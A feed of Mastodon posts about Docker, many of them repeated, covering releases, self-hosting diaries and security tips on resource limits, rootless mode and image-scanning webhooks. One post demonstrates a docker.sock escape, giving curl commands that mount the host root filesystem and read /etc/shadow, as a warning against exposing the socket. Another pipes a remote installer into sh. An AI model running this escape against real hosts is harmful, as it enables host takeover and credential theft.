#Docker

Docker images for pandoc 3.8.2.1 are now available on Docker Hub and the GitHub Container Registry.
New for this release: #Debian bookworm is now supported as a new choice for the base stack, making it an alternative to Alpine, Ubuntu, and static binaries.

#pandoc #Docker

@travis here you go. personally created for you: https://gitlab.melroy.org/-/snippets/622

#mastodon #docker #setup #selfhost #homelab #compose

This post of mine is just a week old and I've already sent it to three people in reply to their questions about how to do exactly that.

And I'm using it now as a reference to implement the same on another project.

So, I figured I might link to it again for those who have missed it somehow:)

https://dev.to/justlig/podman-on-gitlab-ci-fast-efficient-container-builds-no-dind-required-e2e

#Docker #Podman #GitlabCI #Gitlab #CI #CICD

habemus official #docker #image s https://codeberg.org/flohmarkt/-/packages/container/flohmarkt/bcf1692a. (currently only nightlies) \o/

#flohmarkt

This post of mine is just a week old and I've already sent it to three people in reply to their questions about how to do exactly that.

And I'm using it now as a reference to implement the same on another project.

So, I figured I might link to it again for those who have missed it somehow:)

https://dev.to/justlig/podman-on-gitlab-ci-fast-efficient-container-builds-no-dind-required-e2e

#Docker #Podman #GitlabCI #Gitlab #CI #CICD

I tried out an alternative to #Docker Desktop on mac OS 26 from #Apple today. It's basically usable. The good things are that it uses significantly less memory, doesn't require port forwarding, and allows you to access containers from the host using their names if you configure the embedded DNS service with two commands: https://github.com/apple/container/blob/main/docs/tutorial.md#set-up-a-local-dns-domain-optional

@MastodonEngineering #Docker makes #update​s of small #Mastodon servers sooo painless.

まじで、Dockerは1コンテナ1プロセスの原則をちゃんと守るとめちゃめちゃ本番環境にも強くて自由度も高い運用ができるのだけど、実際そこが守られてないから開発用基盤みたいなイメージになってる気がする

#Docker

Good morning Fedi friends!

I feel a little bad that I haven't been able to carry out self-hosting experiments for like a month now 😢​

In my defense, I've been busy promoting the Fediverse (this Friday will mark my 3rd podcast interview - with @firesidefedi YAY, after @aprilorg and @podcast). ICYMI I was also in Berlin for #FediDay, where I had the honor to speak. And I've been busy editing foreign-language version of my Fedi promo video. The German one is out now: https://digitalcourage.video/w/thFf16Yt9y8AMFz1k8P6v1 narrated by the amazing Fediverse champion @melaniebartos ❤️​

It's been a fantastic month... but all these activities mean that I have forgotten EVERYTHING about #Docker so I need to go back to the basics and re-watch intro videos. I literally remember nothing, LOL.

I hope you've been doing well and wishing you a great second day of #FediForum (sadly I can't attend because that's when I'm with my little one, after pre-school). Enjoy!

#MySoCalledSudoLife

I have an old laptop laying around and before investing any money into a proper #homelab setup I wanted to set it up and toss it into the cabinet with my router. Probably gonna just put #debian on it unless anybody can point out something that might work better?

For now I want to start experimenting with #homeassistant but if I find that it actually becomes useful I would also like to set it up as a NAS later on. Any stack recommendations? Thinking of #docker for now?

@homelab @homelab_de

Trying to work out if it's possible to configure Containerd to set (or the equivalent of) the `--init` flag on container run so `tini` hosts PID 1 and signal handling works properly.

It looks like `--init` does some magic - I can see runc has some PID/FD parameters, but it loooks like CRI doesn't have an escape hatch for any say, arbitrary arguments - even if I did work out the magic.

https://github.com/kubernetes/cri-api/blob/15d088979b4574be15436b5b9772f934874a27ad/pkg/apis/runtime/v1/api.proto#L1133

Containerd config is even more sparse on the CRI (or at least, the man page is)
https://github.com/containerd/containerd/blob/main/docs/man/containerd-config.toml.5.md

I really don't want to have to insist that every damn Dockerfile bundles `tini` and sets `ENTRYPOINT`.

#Containers #CRI #OCI #Docker #Containerd #k8s #Kubernetes

👍 👍 👍

#Podman #OCI #Buildah #Containers #Docker

https://podman.io/blogs/2018/10/31/podman-buildah-relationship

Une mission longue se termine, je vais avoir de la dispo à partir de fin octobre !

Je fais du développement back #php et suis expert #drupal.

Je joue beaucoup avec la CI pour automatiser la chaîne de production d'une app web.

#Docker pour le dev ou la prod.

Formation, atelier, accompagnement sur tous ces sujets.

Le tout en indépendant depuis l’Auvergne mais je me déplace avec plaisir quand c'est nécessaire.

https://www.linkedin.com/feed/update/urn:li:activity:7378860770412929025/

#job #freelance

Une mission longue se termine, je vais avoir de la dispo à partir de fin octobre !

Je fais du développement back #php et suis expert #drupal.

Je joue beaucoup avec la CI pour automatiser la chaîne de production d'une app web.

#Docker pour le dev ou la prod.

Formation, atelier, accompagnement sur tous ces sujets.

Le tout en indépendant depuis l’Auvergne mais je me déplace avec plaisir quand c'est nécessaire.

https://www.linkedin.com/feed/update/urn:li:activity:7378860770412929025/

#job #freelance

A grumpy ItSec guy walks through the office when he overhears an exchange of words.

devops0: Two containers went rogue last night and starved the whole host.
devops1: What are we supposed to do?

ItSec (walking by): Set limits. It's not rocket science. Docker exposes cgroup controls for CPU, memory, I/O and PIDs. Use them.

The point is: availability is part of security too. Linux control groups allow you to cap, isolate and observe resource usage, which is exactly how Docker enforces container limits for CPU, memory, block I/O and process counts [1]. Let's make it tangible with a small lab. We'll spin a container, install stress-ng, and watch limits in action.

# On the Docker host
docker run -itd --name ubuntu-limits ubuntu:22.04
docker exec -it ubuntu-limits bash

# Inside the container
apt update && apt install -y stress-ng
stress-ng --version

Check how many cores you see, then drive them.

# Inside the container
nproc

# For my host nproc returns 4
stress-ng --cpu 4 --cpu-load 100 --timeout 30s

In another terminal, watch usage from the host.

docker stats

Now clamp CPU for the running container and see the throttle take effect.

docker update ubuntu-limits --cpus=1
docker stats

The --cpus flag is a wrapper over the Linux CFS period/quota; --cpus=1 caps the container at roughly one core worth of time on a multi‑core host.

Memory limits are similar. First tighten RAM and swap, then try to over‑allocate in the container.

# On the host
docker update ubuntu-limits --memory=128m --memory-swap=256m
docker stats 

# Inside the container: stays under the cap
stress-ng --vm 1 --vm-bytes 100M --timeout 30s --vm-keep

# Inside the container: tries to exceed; you may see reclaim/pressure instead of success
stress-ng --vm 1 --vm-bytes 300M --timeout 30s --vm-keep

A few memory details matter. --memory is the hard ceiling; --memory-swap controls total RAM+swap available. Setting swap equal to memory disables swap for that container; leaving it unset often allows swap equal to the memory limit; setting -1 allows unlimited swap up to what the host provides.

docker run -it --rm \
  --name demo \
  --cpus=1 \
  --memory=256m \
  --memory-swap=256m \
  --pids-limit=25 \
  ubuntu:22.04 bash

For plain docker compose (non‑Swarm), set service‑level attributes. The Compose Services reference explicitly supports cpus, mem_limit, memswap_limit and pids_limit on services [2].

services:
  api:
    image: ubuntu:22.04
    command: ["sleep","infinity"]
    cpus: "1"              # 50% of one CPU equivalent
    mem_limit: "256m"      # hard RAM limit
    memswap_limit: "256m"  # RAM+swap; equal to mem_limit disables swap
    pids_limit: 50         # max processes inside the container

[1] https://docs.docker.com/engine/containers/resource_constraints/
[2] https://docs.docker.com/reference/compose-file/services/

For more grumpy stories visit:
1) https://infosec.exchange/@reynardsec/115093791930794699
2) https://infosec.exchange/@reynardsec/115048607028444198
3) https://infosec.exchange/@reynardsec/115014440095793678
4) https://infosec.exchange/@reynardsec/114912792051851956
5) https://infosec.exchange/@reynardsec/115133293060285123
6) https://infosec.exchange/@reynardsec/115178689445065785

#appsec #devops #programming #webdev #docker #containers #cybersecurity #infosec #cloud #sysadmin #sysops #java #php #javascript #node

A grumpy ItSec guy walks through the office when he overhears an exchange of words.

devops0: Two containers went rogue last night and starved the whole host.
devops1: What are we supposed to do?

ItSec (walking by): Set limits. It's not rocket science. Docker exposes cgroup controls for CPU, memory, I/O and PIDs. Use them.

The point is: availability is part of security too. Linux control groups allow you to cap, isolate and observe resource usage, which is exactly how Docker enforces container limits for CPU, memory, block I/O and process counts [1]. Let's make it tangible with a small lab. We'll spin a container, install stress-ng, and watch limits in action.

# On the Docker host
docker run -itd --name ubuntu-limits ubuntu:22.04
docker exec -it ubuntu-limits bash

# Inside the container
apt update && apt install -y stress-ng
stress-ng --version

Check how many cores you see, then drive them.

# Inside the container
nproc

# For my host nproc returns 4
stress-ng --cpu 4 --cpu-load 100 --timeout 30s

In another terminal, watch usage from the host.

docker stats

Now clamp CPU for the running container and see the throttle take effect.

docker update ubuntu-limits --cpus=1
docker stats

The --cpus flag is a wrapper over the Linux CFS period/quota; --cpus=1 caps the container at roughly one core worth of time on a multi‑core host.

Memory limits are similar. First tighten RAM and swap, then try to over‑allocate in the container.

# On the host
docker update ubuntu-limits --memory=128m --memory-swap=256m
docker stats 

# Inside the container: stays under the cap
stress-ng --vm 1 --vm-bytes 100M --timeout 30s --vm-keep

# Inside the container: tries to exceed; you may see reclaim/pressure instead of success
stress-ng --vm 1 --vm-bytes 300M --timeout 30s --vm-keep

A few memory details matter. --memory is the hard ceiling; --memory-swap controls total RAM+swap available. Setting swap equal to memory disables swap for that container; leaving it unset often allows swap equal to the memory limit; setting -1 allows unlimited swap up to what the host provides.

docker run -it --rm \
  --name demo \
  --cpus=1 \
  --memory=256m \
  --memory-swap=256m \
  --pids-limit=25 \
  ubuntu:22.04 bash

For plain docker compose (non‑Swarm), set service‑level attributes. The Compose Services reference explicitly supports cpus, mem_limit, memswap_limit and pids_limit on services [2].

services:
  api:
    image: ubuntu:22.04
    command: ["sleep","infinity"]
    cpus: "1"              # 50% of one CPU equivalent
    mem_limit: "256m"      # hard RAM limit
    memswap_limit: "256m"  # RAM+swap; equal to mem_limit disables swap
    pids_limit: 50         # max processes inside the container

[1] https://docs.docker.com/engine/containers/resource_constraints/
[2] https://docs.docker.com/reference/compose-file/services/

For more grumpy stories visit:
1) https://infosec.exchange/@reynardsec/115093791930794699
2) https://infosec.exchange/@reynardsec/115048607028444198
3) https://infosec.exchange/@reynardsec/115014440095793678
4) https://infosec.exchange/@reynardsec/114912792051851956
5) https://infosec.exchange/@reynardsec/115133293060285123
6) https://infosec.exchange/@reynardsec/115178689445065785

#appsec #devops #programming #webdev #docker #containers #cybersecurity #infosec #cloud #sysadmin #sysops #java #php #javascript #node

I turned a tiny #Mac mini into my own #Mastodon server—secure, low‑maintenance, and running like a dream. Here’s the full build, from #Docker to #Cloudflare Tunnel, and why #SelfHosting doesn’t have to be a headache.

#Fediverse #ActivityPub #HomeLab #DevOps #SysAdmin

https://phoenixtrap.com/2025/09/21/my-mini-mastodon-server/?utm_source=mastodon&utm_medium=jetpack_social

I turned a tiny #Mac mini into my own #Mastodon server—secure, low‑maintenance, and running like a dream. Here’s the full build, from #Docker to #Cloudflare Tunnel, and why #SelfHosting doesn’t have to be a headache.

#Fediverse #ActivityPub #HomeLab #DevOps #SysAdmin

https://phoenixtrap.com/2025/09/21/my-mini-mastodon-server/?utm_source=mastodon&utm_medium=jetpack_social

I turned a tiny #Mac mini into my own #Mastodon server—secure, low‑maintenance, and running like a dream. Here’s the full build, from #Docker to #Cloudflare Tunnel, and why #SelfHosting doesn’t have to be a headache.

#Fediverse #ActivityPub #HomeLab #DevOps #SysAdmin

https://phoenixtrap.com/2025/09/21/my-mini-mastodon-server/?utm_source=mastodon&utm_medium=jetpack_social

I turned a tiny #Mac mini into my own #Mastodon server—secure, low‑maintenance, and running like a dream. Here’s the full build, from #Docker to #Cloudflare Tunnel, and why #SelfHosting doesn’t have to be a headache.

#Fediverse #ActivityPub #HomeLab #DevOps #SysAdmin

https://phoenixtrap.com/2025/09/21/my-mini-mastodon-server/?utm_source=mastodon&utm_medium=jetpack_social

Docker images based on Alpine are now available with pandoc 3.8.

Ubuntu images haven't been updated yet, as pandoc-crossref no longer compiles when using the default tools on Ubuntu 24.04 (Noble Numbat). I'm still searching for an acceptable solution for this.

One possible option is to remove pandoc-crossref from the images to avoid being blocked by third-parties.

https://hub.docker.com/u/pandoc

#pandoc #docker #pandoc_crossref

devops0: Our audit report says we must "enable Docker rootless mode". I have no clue what that even is...
devops1: Sounds like some another security BS. What's "rootless" supposed to do?

ItSec: Relax. Rootless mode runs the Docker daemon and containers as a regular, unprivileged user [1]. It uses a user namespace, so both the daemon and your containers live in "user space", not as root. That shrinks the blast radius if the daemon or a app in container is compromised, because a breakout wouldn't hand out root on the host.

devops1: Fine. If it's "not hard" to implement, we can consider this.

ItSec: Deal.

Note: this mode does have some limitations. You can review them in docs [2].

First, let's check which user the Docker daemon is currently running as.

ps -C dockerd -o pid,user,group,cmd --no-headers

You should see something like:

9250 root     root     /usr/bin/dockerd -H fd:// --containerd=/run/containerd/containerd.sock

Here's a clean, minimal path that matches the current docs. First, stop the rootful daemon.

sudo systemctl disable --now docker.service docker.socket

Then install the uid/gid mapping tools. On Ubuntu it's uidmap.

sudo apt update && sudo apt install -y uidmap

Docker provides a setup tool. If you installed official DEB/RPM packages, it's already in /usr/bin. Run it as your normal user.

dockerd-rootless-setuptool.sh install

If that command doesn't exist, install the extras package or use the official rootless script.

sudo apt-get install -y docker-ce-rootless-extras
# or, without package manager access:
curl -fsSL https://get.docker.com/rootless | sh

The tool creates a per-user systemd service, a "rootless" CLI context, and prints environment hints. You usually want your client to talk to the user-scoped socket permanently, so export DOCKER_HOST and persist it in your shell profile.

export DOCKER_HOST=unix:///run/user/$(id -u)/docker.sock
echo 'export DOCKER_HOST=unix:///run/user/$(id -u)/docker.sock' >> ~/.bashrc

Enable auto-start for your user session and let services run even after logout ("linger").

systemctl --user enable docker
sudo loginctl enable-linger $(whoami)

Point the CLI at the new context and sanity-check.

docker context use rootless

Once more, check which privileges the Docker daemon is running with:

ps -C dockerd -o pid,user,group,cmd --no-headers

Now you will see something like:

10728 ubuntu   ubuntu   dockerd

And pssst! Podman runs containers in "rootless" mode by default [3].

[1] https://docs.docker.com/engine/security/rootless/
[2] https://docs.docker.com/engine/security/rootless/troubleshoot/
[3] https://documentation.suse.com/en-us/smart/container/html/rootless-podman/index.html#rootless-podman-sle

For more grumpy stories visit:
1) https://infosec.exchange/@reynardsec/115093791930794699
2) https://infosec.exchange/@reynardsec/115048607028444198
3) https://infosec.exchange/@reynardsec/115014440095793678
4) https://infosec.exchange/@reynardsec/114912792051851956
5) https://infosec.exchange/@reynardsec/115133293060285123

#appsec #devops #programming #webdev #java #javascript #python #php #docker #containers #k8s #cybersecurity #infosec #cloud #hacking #sysadmin #sysops

🏕️ my adventures in #selfhosting: day 259 (slow down edition) 🐌​

a blog post that discusses the sense of urgency I felt to learn #Docker (because it will become mandatory for #Ghost)... and how a recent discovery has pushed back my deadline. I can learn slowly, yay!

🔗​: https://news.elenarossini.com/my-so-called-sudo-life/my-adventures-in-self-hosting-day-259-slow-down-edition/

#MySoCalledSudoLife #CLI

A grumpy ItSec guy walks through the office when he overhears an exchange of words.

devops0: These k8s security SaaS prices are wild.
devops1: Image scanning, policy engines, "enterprise tiers"... why are we paying so much?

ItSec (walking by): You pay for updates & support, probably, but you can do some of this yourselves with a bit of k8s hacking.

devops0: How, exactly?

Disclaimer: this is a PoC for learning, not a production-ready solution.

Kubernetes can ask an external webhook whether a given image should be allowed via Admission Controller, in this case ImagePolicyWebhook [1]. The webhook receives an ImageReview payload [2], initiates a scan, and returns "allowed: true/false".

We will write a Flask endpoint that invokes Trivy [3] for each image and denies pod creation process if HIGH or CRITICAL vuln appear.

Below is a minimal Flask service.

from flask import Flask, request, jsonify
import subprocess, json, shlex, re

app = Flask(__name__)

def is_valid_image_format(image: str) -> bool:
    if not re.fullmatch(r"[A-Za-z0-9/_:.@+-]{1,300}", image):
        return False
    if image.startswith("-"):
        return False
    return True


def scan_with_trivy(image: str):
    cmd = [
        "trivy", "--quiet",
        "--severity", "HIGH,CRITICAL",
        "image", "--format", "json",
        image
    ]
    r = subprocess.run(cmd, capture_output=True, text=True)
    try:
        data = json.loads(r.stdout or "{}")
        results = data.get("Results", [])
        vulns = []
        for res in results:
            for v in res.get("Vulnerabilities", []) or []:
                if v.get("Severity") in ("HIGH", "CRITICAL"):
                    vulns.append(v)
        return vulns
    except json.JSONDecodeError:
        return None

@app.route("/scan", methods=["POST"])
def scan():
    body = request.get_json(force=True, silent=True) or {}
    containers = body.get("spec", {}).get("containers", [])
    if not containers:
        return jsonify({
            "apiVersion": "imagepolicy.k8s.io/v1alpha1",
            "kind": "ImageReview",
            "status": {"allowed": False, "reason": "No containers provided"}
        })

    results = []
    decision = True
    for c in containers:
        image = c.get("image", "")
        if not is_valid_image_format(image):
            results.append({"image": image, "allowed": False, "reason": "Invalid image format"})
            decision = False
            continue
        vulns = scan_with_trivy(shlex.quote(image))
        if vulns is None:
            results.append({"image": image, "allowed": False, "reason": "Scanner error"})
            decision = False
            continue
        if vulns:
            results.append({"image": image, "allowed": False, "reason": "HIGH/CRITICAL vulnerabilities detected"})
            decision = False
        else:
            results.append({"image": image, "allowed": True})

    return jsonify({
        "apiVersion": "imagepolicy.k8s.io/v1alpha1",
        "kind": "ImageReview",
        "status": {"allowed": decision, "results": results}
    })

if __name__ == "__main__":
    app.run(host="0.0.0.0", port=5000)

Run the service wherever Trivy is available. Tip: warm up the trivy vulns db once so the first request will not timeout.

trivy image alpine:3.22 #warm up 
gunicorn -w 4 -b 0.0.0.0:5000 app:app

Test it with an ImageReview-like request. Replace the and URL and images as you wish/need.

curl -s -X POST http://127.0.0.1:5000/scan -H "Content-Type: application/json" -d '{
    "apiVersion": "imagepolicy.k8s.io/v1alpha1",
    "kind": "ImageReview",
    "spec": {
      "containers": [
        {"image": "alpine:3.22"},
        {"image": "nginx:latest"}
      ]
    }
  }' | jq .

Tell the API server to use ImagePolicyWebhook. The AdmissionConfiguration points at a kubeconfig for the webhook endpoint (/etc/kubernetes/admission-control-config.yaml).

apiVersion: apiserver.config.k8s.io/v1
kind: AdmissionConfiguration
plugins:
- name: ImagePolicyWebhook
  configuration:
    imagePolicy:
      kubeConfigFile: /etc/kubernetes/webhook-kubeconfig.yaml
      allowTTL: 50
      denyTTL: 50
      retryBackoff: 500
      defaultAllow: false

The webhook kubeconfig targets your scanner's HTTP endpoint (/etc/kubernetes/webhook-kubeconfig.yaml). Edit "server" value for your case.

apiVersion: v1
kind: Config
clusters:
- name: webhook
  cluster:
    server: http://192.168.108.48:5000/scan
contexts:
- name: webhook
  context:
    cluster: webhook
    user: ""
current-context: webhook

Mount the AdmissionConfiguration and enable the plugin in the API server manifest. Add the following flags and mount the config file; adjust paths and IPs to your environment (kube-apiserver.yaml):

---
apiVersion: v1
[...]
  containers:
  - command:
    - kube-apiserver
[...]
    - --admission-control-config-file=/etc/kubernetes/admission-control-config.yaml
    - --enable-admission-plugins=NodeRestriction,ImagePolicyWebhook
[...]
    volumeMounts:
[...]
    - mountPath: /etc/kubernetes/admission-control-config.yaml
      name: admission-control-config
      readOnly: true
    - mountPath: /etc/kubernetes/webhook-kubeconfig.yaml
      name: webhook-kubeconfig
      readOnly: true
  volumes:
[...]
      path: /etc/kubernetes/admission-control-config.yaml
      type: FileOrCreate
  - name: webhook-kubeconfig
    hostPath:
      path: /etc/kubernetes/webhook-kubeconfig.yaml
      type: FileOrCreate

After the API server restarts, the cluster will begin asking app about images during pod creation. A quick check shows an allowed image and a blocked one:

kubectl run ok --image=docker.io/alpine:3.22
pod/ok created

kubectl run nope --image=docker.io/nginx:latest
Error from server (Forbidden): pods "nope" is forbidden: one or more images rejected by webhook backend

That's the whole trick. Kubernetes asks our Flask app. App calls Trivy. If HIGH or CRITICAL vulnerabilities are present, the admission decision is deny, and the pod never starts. It's not fancy and as I wrote before, it's not meant for production, but it illustrates exactly how admission can enforce image hygiene without buying an external SaaS.

[1] https://kubernetes.io/docs/reference/access-authn-authz/admission-controllers/#imagepolicywebhook
[2] https://kubernetes.io/docs/reference/access-authn-authz/admission-controllers/#request-payloads
[3] https://github.com/aquasecurity/trivy

For more grumpy stories visit:
1) https://infosec.exchange/@reynardsec/115093791930794699
2) https://infosec.exchange/@reynardsec/115048607028444198
3) https://infosec.exchange/@reynardsec/115014440095793678
4) https://infosec.exchange/@reynardsec/114912792051851956

#appsec #devops #kubernetes #programming #webdev #docker #containers #k8s #cybersecurity #infosec #cloud #hacking #sysadmin #sysops

Dear Fedi friends,

Happy Thursday from rainy northern Italy 🌧️

In case you missed it: I've spent the past two weeks doing all kinds of #selfhosting explorations, as I strive to learn #Docker to move my Ghost site there (it's recommended for Ghost v6 and going forward).

Yesterday I shared a blog post about the peaches (highs) and pits (lows) in #MySoCalledSudoLife adventures.

I'm hoping my mistakes can be useful for fellow newbies 😅

🔗 : https://news.elenarossini.com/my-so-called-sudo-life/my-so-called-sudo-life-month-8-peaches-pits/

#blog #VPS #newbie

Dear Fedi friends,

Happy Thursday from rainy northern Italy 🌧️

In case you missed it: I've spent the past two weeks doing all kinds of #selfhosting explorations, as I strive to learn #Docker to move my Ghost site there (it's recommended for Ghost v6 and going forward).

Yesterday I shared a blog post about the peaches (highs) and pits (lows) in #MySoCalledSudoLife adventures.

I'm hoping my mistakes can be useful for fellow newbies 😅

🔗 : https://news.elenarossini.com/my-so-called-sudo-life/my-so-called-sudo-life-month-8-peaches-pits/

#blog #VPS #newbie

Taking Back Control: My Journey into Self-Hosting with Raspberry Pi
I am using Raspberry Pi 4 and 5 to self-host my blog, social media, and cloud storage. Here is why digital sovereignty matters, and how you can start your own self-hosti
https://beitmenotyou.online/taking-back-control-my-journey-into-self-hosting-with-raspberry-pi/
#SelfHosting #ActivityPub #Blogging #Cloudflare #Decentralisation #DigitalSovereignty #Docker #Nextcloud #RaspberryPi #SelfHosting #Web3 #WordPress

Taking Back Control: My Journey into Self-Hosting with Raspberry Pi
I am using Raspberry Pi 4 and 5 to self-host my blog, social media, and cloud storage. Here is why digital sovereignty matters, and how you can start your own self-hosti
https://beitmenotyou.online/taking-back-control-my-journey-into-self-hosting-with-raspberry-pi/
#SelfHosting #ActivityPub #Blogging #Cloudflare #Decentralisation #DigitalSovereignty #Docker #Nextcloud #RaspberryPi #SelfHosting #Web3 #WordPress

A grumpy ItSec guy walks through the office when he overhears an exchange of words.

devops0: I need to manage other containers on the node from my container, hmm...
devops1: Just mount /var/run/docker.sock into it and move on.

ItSec (walking by): Guys... a quick test. From inside that container, run:

curl -s --unix-socket /var/run/docker.sock http://localhost/containers/json 

If you get JSON back, then you've handed that container admin-level control of the Docker daemon - so please don't...

devops0: So what? What does it mean?

Let's learn by example. The Docker CLI talks to the Docker daemon over a UNIX socket at (by default) /var/run/docker.sock [1]. That socket exposes the Docker Engine's REST API. With it, you can list, start, stop, create, or reconfigure containers - effectively controlling the host via the daemon. Now, the oops pattern we seeing:

# Dangerous: gives the container full control of the Docker daemon
docker run -it -v /var/run/docker.sock:/var/run/docker.sock ubuntu:24.04

If an attacker gets any code execution in that container (RCE, webshell, deserialization bug, etc), they can pivot to the Docker host. Here's how in practice:

# 1) From the compromised container that "sees" docker.sock: create a "helper" container that bind-mounts the host root

# apt update && apt install -y curl

curl --unix-socket /var/run/docker.sock -H 'Content-Type: application/json' \
  -X POST "http://localhost/containers/create?name=escape" \
  -d '{
        "Image": "ubuntu:24.04",
        "Cmd": ["sleep","infinity"],
        "HostConfig": { "Binds": ["/:/host:rw"] }
      }'

# 2) Start it
curl --unix-socket /var/run/docker.sock -X POST http://localhost/containers/escape/start

From there, the attacker can shell in and operates on /host (add SSH keys, read secrets, drop binaries, whatever), or even chroots because why not:

# Read /etc/shadow of Docker Host using only curl, step 1:

curl --unix-socket /var/run/docker.sock -s \
  -H 'Content-Type: application/json' \
  -X POST http://localhost/containers/escape/exec \
  -d '{
    "AttachStdout": true,
    "AttachStderr": true,
    "Tty": true,
      "Cmd": ["cat","/host/etc/shadow"]
  }'

# Step 2, read output of previous command (replace exec ID with yours):
curl --unix-socket /var/run/docker.sock -s --no-buffer \
  -H 'Content-Type: application/json' \
  -X POST http://localhost/exec/1ec29063e5c13ac73b907f57470552dd39519bad293bf6677bedadaad9fcde89/start \
  -d '{"Detach": false, "Tty": true}' 

Keep in mind this isn't only an RCE issue: SSRF-style bugs can coerce internal services into calling local admin endpoints (including docker.sock or a TCP-exposed daemon).

And one more important point: we understand you may not like when texts like this include conditionals: if a container is compromised, if SSRF exists, then the socket becomes a bridge to owning the host. It's understandable. Our job, however, is to assume those "ifs" eventually happen and remove the easy paths for bad actors.

[1] https://docs.docker.com/reference/cli/dockerd/#daemon-socket-option
[2] https://docs.docker.com/engine/api/

Other grumpy stories:
1) https://infosec.exchange/@reynardsec/115048607028444198
2) https://infosec.exchange/@reynardsec/115014440095793678
3) https://infosec.exchange/@reynardsec/114912792051851956

#docker #devops #containers #security #kubernetes #cloud #infosec #sre #linux #php #nodejs #java #javascript #programming #cybersecurity #rust #python #js

Taking Back Control: My Journey into Self-Hosting with Raspberry Pi
I am using Raspberry Pi 4 and 5 to self-host my blog, social media, and cloud storage. Here is why digital sovereignty matters, and how you can start your own self-hosti
https://beitmenotyou.online/taking-back-control-my-journey-into-self-hosting-with-raspberry-pi/
#SelfHosting #ActivityPub #Blogging #Cloudflare #Decentralisation #DigitalSovereignty #Docker #Nextcloud #RaspberryPi #SelfHosting #Web3 #WordPress

If you've ever typoed ghcr to ghrc, particularly with a "docker login" or any automation that performs a login to the container registry, I'm seeing a strong indication that your GitHub credentials have been leaked to a malicious actor.

https://bmitch.net/blog/2025-08-22-ghrc-appears-malicious/

#docker #container #registry #OCI #security

🏕️ my adventures in #selfhosting: day 249 (mind of a #newbie edition) 🧠

a blog post about what it's like for newbies to self-host... read till the end to find out what caused my OVH VPS fail (a facepalm moment for sure):

🔗​: https://news.elenarossini.com/my-so-called-sudo-life/my-adventures-in-self-hosting-day-249-mind-of-a-newbie-edition/

I'll probably take a break from self-hosting and reading about #Docker (my Everest) for the rest of the weekend... so I can come back to it on Monday with my batteries fully recharged 😅​

#MySoCalledSudoLife

If you've ever typoed ghcr to ghrc, particularly with a "docker login" or any automation that performs a login to the container registry, I'm seeing a strong indication that your GitHub credentials have been leaked to a malicious actor.

https://bmitch.net/blog/2025-08-22-ghrc-appears-malicious/

#docker #container #registry #OCI #security

Me right now: studying the ins and outs of #Docker, ports exposure, firewalls and #TLS.

I’ve got a brand new VPS (on Hetzner) that for now only has #Fail2Ban on it.

Let’s see when I’ll feel confident (reckless?) enough to install #Docker on it 😅

This time I learned my lesson and I’m only paying month-by-month. And I’ve got many thoughts about what went down yesterday that I may share in a blog post soon.

Thanks for all your supportive messages ❤️ I hope my public fumbles are useful to fellow #selfhosting newbies 🥲

#MySoCalledSudoLife #SudoMaImparo

Dear Fedi friends,

I've been a little quiet on this account because I'd been pouring all my energy into setting up a new VPS as a testing ground to learn #Docker.

I need to become proficient in Docker ASAP in order to move my Ghost CLI site there (if I want it to federate).

The past 48 hours have been a real rollercoaster ride, as you could read on my GoToSocial account @elena.

Please beware of #OVH! They terminated my VPS without any notice: https://aseachange.com/@elena/statuses/01K35V57PPWH29969DSTC1117A 😵‍💫

#MySoCalledSudoLife

Dear Fedi friends,

I've been a little quiet on this account because I'd been pouring all my energy into setting up a new VPS as a testing ground to learn #Docker.

I need to become proficient in Docker ASAP in order to move my Ghost CLI site there (if I want it to federate).

The past 48 hours have been a real rollercoaster ride, as you could read on my GoToSocial account @elena.

Please beware of #OVH! They terminated my VPS without any notice: https://aseachange.com/@elena/statuses/01K35V57PPWH29969DSTC1117A 😵‍💫

#MySoCalledSudoLife

⚠️#Docker: If you are using Docker for Desktop you need to update it TODAY to v4.44.3. Critical CVE-2025-9074 #vulnerability in previous versions allows malicious containers to access host system:

👇
https://www.heise.de/en/news/Docker-Desktop-Critical-vulnerability-allows-host-access-10560707.html

⚠️#Docker: If you are using Docker for Desktop you need to update it TODAY to v4.44.3. Critical CVE-2025-9074 #vulnerability in previous versions allows malicious containers to access host system:

👇
https://www.heise.de/en/news/Docker-Desktop-Critical-vulnerability-allows-host-access-10560707.html

Dear Fedi friends,

Oh happy day!

My #Docker woes have gone away since I realized I can use Docker exclusively via CLI (and not GUI - I thought that was the default). When I couldn’t connect Docker Desktop to my VPS yesterday I was feeling so down. But yay Docker CLI here I come.

Special thanks to everyone who offered advice yesterday, ESPECIALLY @antoine_ali 🏆

I have a feeling you’ll get a laugh out of my next blog post detailing my #selfhosting attempts - because my perception of how Docker operates was all warped.

I must have exposed to the outside my current Docker instance with yesterday’s inane tweaks to access the GUI, so I will uninstall and re-install Docker first thing today… and up the challenge by attempting to do a fresh Ghost installation on it.

I truly know nothing! But I know more than yesterday, that’s for sure. 🤗

Thank you for all your advice (and patience!) 🙏

#MySoCalledSudoLife

Anatomy of my day:
😊 7:30am: YAY I can start playing around with my new VPS (no.3) while my little one sleeps
🥳 9:00am: YAY I successfully installed Fail2Ban and #Docker
😳​ 10:00am: why can't I connect my VPS to Docker Desktop? Time to call it a day.
👭​ 11:00am: take my little one to the park, run into friends there, the day is looking up
🥴​ 1:00pm: while my little one is being looked after by my parents, I re-attempt to connect my VPS to Docker. No go. I try to install #Portainer thinking it would make the task easier, but I can't seem to upload the right certificates to connect.
😩​ 1:00pm - 4:00pm: tackle other tasks (inbox zero, errands), play #LEGO with my little one... with one persistent thought on my mind: why is setting up Docker so hard?!? I thought it would be easy.
🙂​ now: planning to take my little one bowling for the first time. A superb way to end the day on a good note (hopefully)

🌄​ tomorrow is another day. you win some, you lose some. Wishing you all a lovely afternoon/evening wherever you are​

P.S.: For context, ICYMI, I wrote about why I absolutely need to learn Docker ASAP here: https://news.elenarossini.com/my-so-called-sudo-life/my-adventures-in-self-hosting-day-244-everest-edition

Dear Fedi friends,

Sometimes it's good to know when you need to call it a day. Today I ended my #sudo exploits at 10:00am... I'm mentally exhausted already... but happy about the progress I made.

I started tinkering with my new VPS at 7:30am and managed the following tasks:

- installed #fail2ban
- installed #Docker and checked if it was running successfully with their "hello world" method (it does)
- enabled remote access changing the listening port
- secured the connection with TLS

I wasn't able to create a new Docker context on Docker Desktop to point to my VPS... I ran into error messages about having to include certificates (with the right path)... so I decided to call it a day.

I wanted to end my Day 1 of Docker explorations on a good note.

I plan on writing about this on my blog later today so I can refer back to the steps later... when I actually install Docker on my VPS running Ghost.

Onwards and upwards (it's very apt that "sudo" in Italian means "I sweat" LOOOOL)

#MySoCalledSudoLife #selfhosting #newbie

🏕️ my adventures in #selfhosting: day 244 (Everest edition) ⛰️

